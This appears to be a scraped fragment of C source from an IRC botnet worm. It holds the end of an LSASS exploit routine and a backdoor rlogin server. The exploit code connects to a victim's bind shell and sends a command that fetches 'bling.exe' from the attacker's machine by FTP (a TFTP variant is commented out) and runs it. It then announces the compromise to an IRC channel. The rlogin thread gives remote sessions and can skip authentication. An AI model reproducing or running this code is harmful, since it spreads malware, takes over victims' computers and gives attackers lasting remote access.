			return FALSE;
		}
	}

	len = frecv(sSocket, recvbuf, 1600, 0);

	if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
		fclosesocket(sSocket);
		return FALSE;
	}

	memset(&bsin, 0, sizeof(bsin));
	bsin.sin_family = AF_INET;
	bsin.sin_port = fhtons(LSASS_BSPORT);
	bsin.sin_addr.s_addr = finet_addr(exinfo.ip);

	if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
		fclosesocket(sSocket);
		fclosesocket(bSocket);
		return FALSE;
	}

	if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
		Sleep(500);

		_snprintf(cmd_buff, sizeof(cmd_buff),
	//		"tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
			"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
		GetIP(exinfo.sock),FTP_PORT);	
	
		if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			fclosesocket(bSocket);
			return FALSE;
		}

		fclosesocket(sSocket);
		fclosesocket(bSocket);

		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent)
			irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;

		return TRUE;
	} else
		return FALSE;
}
Пример #30
0
DWORD WINAPI RlogindClientThread(LPVOID param)
{
	RLOGIND rlogind = *((RLOGIND *)param);
	RLOGIND *rloginds = (RLOGIND *)param;
	rloginds->gotinfo = TRUE;	

	int threadnum=rlogind.cthreadnum;
	
	char LocalUser[16], RemoteUser[16], TerminalType[64], HostName[100], Buffer[16];
	LPHOSTENT HostEnt;
	SOCKADDR_IN csin;

	TIMEVAL timeout;
	timeout.tv_sec = 10;
	timeout.tv_usec = 0;
	fd_set fd;
	FD_ZERO(&fd);
	FD_SET(threads[threadnum].sock, &fd);

	if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}

	frecv(threads[threadnum].sock, (char *)&Buffer, 1, 0);

	GetStr(threads[threadnum].sock, RemoteUser, sizeof(RemoteUser));
	GetStr(threads[threadnum].sock, LocalUser, sizeof(LocalUser));
	GetStr(threads[threadnum].sock, TerminalType, sizeof(TerminalType));

	int csin_len = sizeof(csin);
	if (fgetpeername(threads[threadnum].sock, (LPSOCKADDR)&csin, &csin_len) != 0) {
		addlogv("[RLOGIND]: Error: getpeername(): <%d>.", fWSAGetLastError());
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}

	if ((HostEnt = fgethostbyaddr((char *)&csin.sin_addr, sizeof(csin.sin_addr), PF_INET)) == NULL) 
		sprintf(HostName, finet_ntoa(csin.sin_addr));
	else
		strcpy(HostName, HostEnt->h_name);

	frecv(threads[threadnum].sock, (char *)Buffer, sizeof(Buffer), 0);
	fsend(threads[threadnum].sock, "", 1, 0);

	if (!InsecureFlag && !CheckLogin(RemoteUser,HostName,rlogind.username,csin.sin_addr.s_addr)) {
		fsend(threads[threadnum].sock, "PERMISSION DENIED.", sizeof("PERMISSION DENIED."), 0);
		fshutdown(threads[threadnum].sock,SD_BOTH);
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(0);
	}

	addlogv("[RLOGIND]: User logged in: <%s@%s>.", RemoteUser, HostName);

	if (!SessionRun(threadnum)) {
		addlogv("[RLOGIND]: Error: SessionRun(): <%d>.", GetLastError());
		fshutdown(threads[threadnum].sock,SD_BOTH);
		fclosesocket(threads[threadnum].sock);
		clearthread(threadnum);
		ExitThread(1);
	}

	addlogv("[RLOGIND]: User logged out: <%s@%s>.", RemoteUser, HostName);

	fshutdown(threads[threadnum].sock,SD_BOTH);
	fclosesocket(threads[threadnum].sock);
	clearthread(threadnum);
	ExitThread(0);
}